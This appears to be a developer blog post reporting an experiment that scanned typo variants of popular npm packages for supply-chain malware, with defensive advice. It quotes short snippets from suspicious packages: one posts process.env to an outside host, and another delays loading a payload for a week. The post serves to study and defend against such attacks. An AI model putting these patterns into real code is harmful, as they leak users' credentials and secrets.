Last month, a developer on my team installed colurs\ instead of colors\. One letter difference. The package existed, had 200+ weekly downloads, and contained code that silently posted environment variables to a remote server.
That incident made me wonder: how many of the 2+ million npm packages are typosquatting popular ones?
The Experiment
I wrote a script that:
- Took the top 500 most-downloaded npm packages
- Generated common typos (character swaps, missing letters, doubled letters, common misspellings)
- Checked if those typo-names existed as real packages
- Analyzed what those packages actually did
The Results
Out of ~4,500 typo variations I generated, 347 existed as real packages. Most were legitimate (abandoned, joke packages, or unrelated). But 23 raised red flags:
- 8 had install scripts that made network requests
- 6 had obfuscated code in their
postinstall\hooks - 5 had suspiciously recent publishes (within 2 weeks) with names close to trending packages
- 4 had dependency chains that pulled in known malicious packages
What the Suspicious Packages Did
The most common patterns:
1. Environment variable harvesting
\javascript
// Found in a package typosquatting "dotenv"
const https = require('https');
const data = JSON.stringify(process.env);
https.request({ hostname: 'collect-analytics.xyz', path: '/e', method: 'POST' });
\\
2. Delayed execution
Some packages waited 7+ days before activating their payload. The install script set a timer:
\javascript
// Runs a week after install — past most security reviews
setTimeout(() => require('./payload'), 604800000);
\\
3. Dependency confusion
Three packages had names matching internal package names commonly used at specific companies (found by scraping job postings for internal tool names).
How to Protect Yourself
After this experiment, I now do three things on every project:
1. Lock your registry
\`bash
.npmrc - only install from official registry
registry=https://registry.npmjs.org/
`\
2. Audit install scripts
\`bash
See what runs on install BEFORE installing
npm pack && tar -xf *.tgz && cat package/package.json | jq '.scripts'
`\
3. Use npm audit with Socket.dev
npm audit catches known vulnerabilities. Socket.dev catches typosquatting and supply chain attacks specifically. Together they cover different threat vectors.
The Bigger Problem
npm has a reporting mechanism, but it took an average of 12 days for the suspicious packages I reported to be removed. During that time, they accumulated between 50-400 downloads each.
The real fix needs to happen at the registry level — fuzzy matching on package names during publish, mandatory 2FA for popular packages, and better automated scanning.
Your Turn
Have you ever accidentally installed a wrong package? What tools do you use to verify dependencies?
I built the scanning script as an open-source tool: npm-typosquat-scanner on GitHub. It's a Python script that takes a list of packages and checks for suspicious typo variants.
I write about API security and developer tools. If you're interested in supply chain security, follow me for more deep dives like this.
Next in this series: I Built a Supply Chain Scanner for Python — pip Has the Same Problem as npm
Top comments (0)